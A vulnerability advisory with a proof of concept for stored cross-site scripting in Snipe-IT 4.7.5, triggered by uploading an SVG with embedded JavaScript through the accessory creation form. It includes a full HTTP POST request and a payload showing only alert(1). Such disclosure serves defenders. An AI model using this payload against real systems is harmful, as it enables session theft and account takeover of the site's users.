Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting

1. Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting
2.  
3. Snipe-IT v4.7.5 has persistent cross-site scripting vulnerability via uploading SVG files in the accessories section. A malicious authorized user could potentially upload an SVG with a javascript payload.
4.  
5. Steps to Reproduce:
6. Upload crafted SVG file when sent a request to create an accessory.
7. Click the created accessory and copy the uploaded file location.
8. Browse the uploaded SVG file location on the browser.
9. The alert box will be opened.
10.  
11. (PoC) Post Request:
12.  
13. POST /accessories HTTP/1.1
14. Host: target
15. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
16. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
17. Accept-Language: en-US,en;q=0.5
18. Accept-Encoding: gzip, deflate
19. Referer: http://target/accessories/create
20. Content-Type: multipart/form-data; boundary=---------------------------6547029722068941066578895105
21. Content-Length: 1761
22. Cookie: XSRF-TOKEN=*; snipeitv4_session=*; laravel_token=*
23. Connection: close
24. Upgrade-Insecure-Requests: 1
25.  
26. .
27. ..
28. snip
29. ..
30. .
31.  
32. Content-Disposition: form-data; name="image"; filename="test.svg"
33. Content-Type: image/svg+xml
34.  
35. <?xml version="1.0" standalone="no"?>
36. <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
37. <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
38. <script type="text/javascript">
39. alert(1);
40. </script>
41. </svg>
42. -----------------------------6547029722068941066578895105--